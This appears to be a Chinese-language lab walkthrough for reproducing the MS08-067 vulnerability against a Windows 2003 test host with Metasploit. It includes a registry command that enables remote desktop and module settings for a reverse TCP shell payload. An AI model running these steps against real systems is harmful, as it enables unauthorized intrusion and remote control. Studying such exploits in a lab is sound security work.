滲透測試中期–漏洞復現–MS08_067

  • 2021 年 1 月 23 日
  • 筆記

靶機:Win2k3    10.10.10.130

攻擊機:BT5      10.10.10.128

一:nmap 查看WinK3是否開放端口3389

  

 

 開放3389方法:我的電腦->屬性->遠程

  

 

   命令行方式開啟3389端口(任意端口):

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

 

二、攻擊階段

  1、查找ms08_067漏洞模塊

   

 

   2、調用08_067_netapi滲透模塊

 

 

   3、查看此滲透模塊所對應的攻擊載荷

 

 

   4、查看設置參數並進行設置所需要的參數

  

set payloads generic/shell_reverse_tcp  #設置所需模塊

set options #查看模塊所需的設置的參數

  

set RHOST 10.10.10.130 #設置目標主機
set LRHOST 10.10.10.128 #設置本機
set LPORT 5000  #設置攻擊機與靶機連接的端口
show targets 
set target 7  #通過show targets 可以查看漏洞所支持windows版本,並設置目標主機所對應的版本序號

 

 

 5、開始攻擊

  

 

 可以看到已經在win2k3的C盤目錄下了